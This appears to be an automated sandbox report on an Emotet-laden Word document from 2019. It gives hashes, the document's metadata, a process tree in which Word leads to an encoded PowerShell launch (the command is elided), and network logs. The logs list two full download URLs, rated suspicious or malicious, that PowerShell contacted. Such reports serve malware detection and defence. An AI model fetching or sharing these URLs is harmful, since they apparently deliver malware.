Field | Value
---|---
Sample: | qwswz4-9sir7-jxlh
Full analysis: | https://app.any.run/tasks/95692cf7-91be-4290-8481-9f3973c48f29
Verdict: | Malicious activity
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded into very destructive malware. It targets mostly corporate victims, but private users are also infected in mass spam email campaigns.
Analysis date: | May 20, 2019, 13:48:19
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: | —
MIME: | application/msword
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Clothing methodologies microchip, Subject: Handmade Wooden Bike, Author: Margaret Willms, Comments: unleash, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 17 06:55:00 2019, Last Saved Time/Date: Fri May 17 06:55:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0
MD5: | 72149D1A57493FB31E99ED26BFE495F6
SHA1: | F5B202B43361CF877FD7B5401F26C76CF418FD3B
SHA256: | 26B0B2660BE3E246F487A7F824EFB63F296D6221AEAE5FB5C661ADC82C78DFAE
SSDEEP: | 3072:M77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q4iZEA9tzzpujpOoSc:M77HUUUUUUUUUUUUUUUUUUUT52Vx+EAS
Extension | Detected file type (score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
CompObjUserTypeLen: | 32
CompObjUserType: | Microsoft Word 97-2003 Document
Title: | Clothing methodologies microchip
Subject: | Handmade Wooden Bike
Author: | Margaret Willms
Keywords: | -
Comments: | unleash
Template: | Normal.dotm
LastModifiedBy: | -
RevisionNumber: | 1
Software: | Microsoft Office Word
TotalEditTime: | -
CreateDate: | 2019:05:17 05:55:00
ModifyDate: | 2019:05:17 05:55:00
Pages: | 1
Words: | 29
Characters: | 170
Security: | None
CodePage: | Windows Latin 1 (Western European)
Company: | Franecki, Green and Waters
Lines: | 1
Paragraphs: | 1
CharCountWithSpaces: | 198
AppVersion: | 16
ScaleCrop: | No
LinksUpToDate: | No
SharedDoc: | No
HyperlinksChanged: | No
TitleOfParts: | -
HeadingPairs: | -
Manager: | Hermiston
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3376 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\qwswz4-9sir7-jxlh.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
3204 | PowErsHell -enC … | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | | wmiprvse.exe

PID | User | Company | Integrity level | Description | Version
---|---|---|---|---|---
3376 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000
3204 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRED99.tmp.cvr | — | — | —
3204 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXZZVTIVMELS5QI0AJ0N.temp | — | — | —
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$swz4-9sir7-jxlh.doc | pgc | 64D75435DB0D6ECBF71DB58CE64F3149 | 6A2F2F67B7385024A2923596CCA5492F8A761DDB85AD71FBB3FC2BCD8FAE3138
3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 59B915F43B43901FA79C60151EA8042C | 836805470EEA2E00AAEE4008E313688C272B90045958CE36BDA26A66D9A0F169
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F62E731C.wmf | wmf | 216C74D71CB4F4B1D41724F0EF9FC72B | 583C4159E78B33E56D57082BE73658872F0DBC445CAD164F3CAB742231F793F4
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | BE3B51A2FFA431A7F2A35ED1AFE23D34 | A72D859171741D1660B2A8C61D47B966A8707778B092CD9704EC2423365C351C
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FF5006D.wmf | wmf | 1012A21156DCFF2937353BEE5985FADC | A9F5E85E96612733BB239D8B221DEF29EFFC0E143359BB1A74882EEA75B8B601
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF602F5E.wmf | wmf | 18177A2722B8E33F76C08B6DF450BA4F | 2A1DD05E8314D744E261661834271ADDF8E08BCEDF3B57E4D93F2063D14B880C
3204 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D928C476.wmf | wmf | 1CBF535FEBA120E606E9565F8294C672 | 60D2DC4F97BBB184D9228D01C36A3D21DD0EFC632FD0F4AB80D1D30CBCA64B88
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3204 | PowErsHell.exe | GET | — | 69.41.190.91:80 | http://edandtrish.com/blue/8wse_zrdnx2c-9775/ | US | — | — | suspicious |
3204 | PowErsHell.exe | GET | 404 | 50.31.162.218:80 | http://classicimagery.com/business/iAGKbxfsk/ | US | text | 9 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3204 | PowErsHell.exe | 69.41.190.91:80 | edandtrish.com | WZ Communications Inc. | US | suspicious |
— | — | 50.31.162.218:80 | classicimagery.com | Server Central Network | US | suspicious |
Domain | IP | Reputation
---|---|---
classicimagery.com | | malicious
edandtrish.com | | suspicious